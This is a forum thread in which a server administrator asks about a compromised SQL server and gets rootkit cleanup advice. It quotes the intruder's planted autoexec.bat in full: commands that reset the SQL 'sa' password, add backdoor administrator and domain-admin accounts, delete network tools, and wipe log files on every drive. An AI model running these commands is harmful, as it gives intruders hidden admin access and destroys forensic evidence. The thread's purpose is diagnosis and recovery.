Autoexec.bat modified on sql server

Posted on 2005-04-12
Medium Priority
Last Modified: 2013-12-04
I was notified by my data center that my bandwidth went up 500% on my sql server.  Upon investigation we found an exe running (info.exe).  Rebooting the server stops the file from running but a search can not find the file.  And it keeps reappearing.  The box has realtime virus protection running (and yes it is up to date) we also run spyware detection. After further investigation we found that the autoexec.bat had been modified as follows:

@ECHO off

osql -E -Q "sp_password NULL,HOLLOWM@N,sa

net user IUSR_ROOT HOLLOWM@N /add
net localgroup Administrators IUSR_ROOT /add
net group "Domain Admins" IUSR_ROOT /add

net user Admin HOLLOWM@N /add
net localgroup Administrators Admin /add
net group "Domain Admins" Admin /add

del c:\ftp.exe /S
del c:\tftp.exe /S
del c:\tftpd.exe /S
del c:\cscript.exe /S
del c:\wscript.exe /S
del c:\telnet.exe /S
del c:\nc.exe /S
del c:\save.bat /S
del c:\rcp.exe /S

del c:\ftp.exe /S
del c:\tftp.exe /S
del c:\tftpd.exe /S
del c:\cscript.exe /S
del c:\wscript.exe /S
del c:\telnet.exe /S
del c:\nc.exe /S
del c:\save.bat /S
del c:\rcp.exe /S

del c:\*.log/s
del d:\*.log/s
del e:\*.log/s
del f:\*.log/s
del g:\*.log/s
del h:\*.log/s
del c:\d.txt
del c:\do.txt
del c:\doc.txt


Any ideas?
Question by:cooperrd
LVL 12

Assisted Solution

rossfingal earned 400 total points
ID: 13764187

Looks like a "Rootkit"
Download and run these (free):
{Rootkit Revealer}  
F-Secure Blacklight Rootkit revealer  

Good luck!
LVL 12

Accepted Solution

Phil_Agcaoili earned 1600 total points
ID: 13765157
If you can't figure out the entry mechanism, you may have no chance but to start from scratch.

You definitely have a rootkit and it's custom from looking at your modified autoexec.bat.

Here are some other resources to shed light on what has happened:

Cleaning Up after a Rootkit attack:
Once you discover a compromised host, you must determine the extent of the attack. You must presume that all network transactions from or to any host "visible" on the network for the duration of the compromise were monitored and that intruders potentially possess any or all of the information so exposed. You should perform recovery and prevent future attacks as described below.

Disconnect the host from the network or operate the system in single-user mode during the recovery. This will keep users and intruders from accessing the system.

Locating Trojan versions of the standard system programs can be difficult, and you should be cautious in doing so. The intruder may have installed other Trojan programs not part of Rootkit, therefore all system utilities should NOT be trusted unless restored from distribution media or a floppy disk as discussed above. This especially refers to cd, dir, mkdir, etc.

I advise that an entire system install be performed from read-only distribution media. If this is not feasible, all system binaries should be compared using a known good copy of md5 against the read-only distribution media. Since rootkits install Trojan programs with the exact checksum and timestamp as the legitimate version, these attributes cannot be used to find Trojan programs. However, cryptographic checksums are nearly impossible to spoof. Therefore, md5 from the read-only floppy described above can be trusted to compare installed programs against the distribution media or known correct checksums.

Resist the temptation of restoring from backups, unless it is positively known the backups were made before the Trojans were installed. Otherwise there is too great a chance the backups contain the Trojan programs, rather than the legitimate ones.

Featured Post

Industry Leaders: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Container Orchestration platforms empower organizations to scale their apps at an exceptional rate. This is the reason numerous innovation-driven companies are moving apps to an appropriated datacenter wide platform that empowers them to scale at a …
OfficeMate Freezes on login or does not load after login credentials are input.
Exchange organizations may use the Journaling Agent of the Transport Service to archive messages going through Exchange. However, if the Transport Service is integrated with some email content management application (such as an anti-spam), the admin…
Loops Section Overview
Suggested Courses

850 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question